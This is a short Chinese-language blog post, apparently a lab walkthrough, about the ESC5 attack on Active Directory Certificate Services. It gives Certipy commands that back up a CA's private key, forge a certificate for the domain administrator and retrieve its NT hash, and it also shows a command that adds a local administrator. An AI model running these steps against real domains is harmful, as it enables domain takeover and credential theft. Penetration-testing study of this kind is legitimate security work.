深入剖析ESC5:利用ADCS配置不当进行Active Directory渗透测试
摘要
继我之前写的ESC4文章之后——现在我的工作已经完成,终于有更多时间学习了,我觉得也应该深入研究一下ESC5。说实话,我不知道为什么,尽管在印度尼西亚的真实环境中还比较少见,但学习Active Directory利用技术感觉要刺激得多。可能只是我理想主义的一面在作祟,哈哈哈。好了,让我们开始一起学习吧。
什么是ESC5
ESC5是一种针对Active Directory证书服务的攻击。这种攻击利用了用户对证书颁发机构的访问权限。如果攻击者获得了CA服务器上的本地管理员权限,就可以提取CA证书及其私钥。利用该私钥,攻击者可以为特权账户伪造恶意证书。这些伪造的证书随后可用于通过PKINIT向AD进行身份验证,并请求TGT。
搭建实验室环境
在CA服务器上创建一个任意名称的账户,并将该账户添加为本地管理员:
net localgroup Administrators "igniteraj" /add
net localgroup Administrators
枚举与漏洞利用
在CA服务器上,使用本地管理员账户通过Certipy枚举证书。
使用Certipy备份CA证书和私钥。
certipy ca-backup -u alex.doe@sandbox.local -p "MyPassword123" -ca ignite-DC-CA -target 10.100.150.10
伪造我们想要接管的账户——本例中是administrator@sandbox.local,因为它是目标上的域管理员。
certipy forge -ca-pfx 'sandbox-ca.pfx' -upn administrator@sandbox.local
使用Certipy获取administrator@sandbox.local账户的NT哈希。
certipy auth -pfx administrator_forged.pfx -dc-ip 10.100.150.10
使用SecretDump导出哈希凭据。
参考文献
- https://www.hackingarticles.in/ad-cs-esc5-vulnerable-pki-object-access-control/
- https://mayfly277.github.io/posts/ADCS-part14/
- https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/
CSD0tFqvECLokhw9aBeRqixLzx0482UkkKWM4rJX2T+9qXDLcUYQal3W1ykfQ9si0pulG6s9/0h/hW8d28k1SsX8sObhJabP00Qx1uju62JSdqgDv8XWiIQ1stSnFOlB/q2Fi82D6F6LlOrFptzcOg==
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码
公众号二维码
浙公网安备 33010602011771号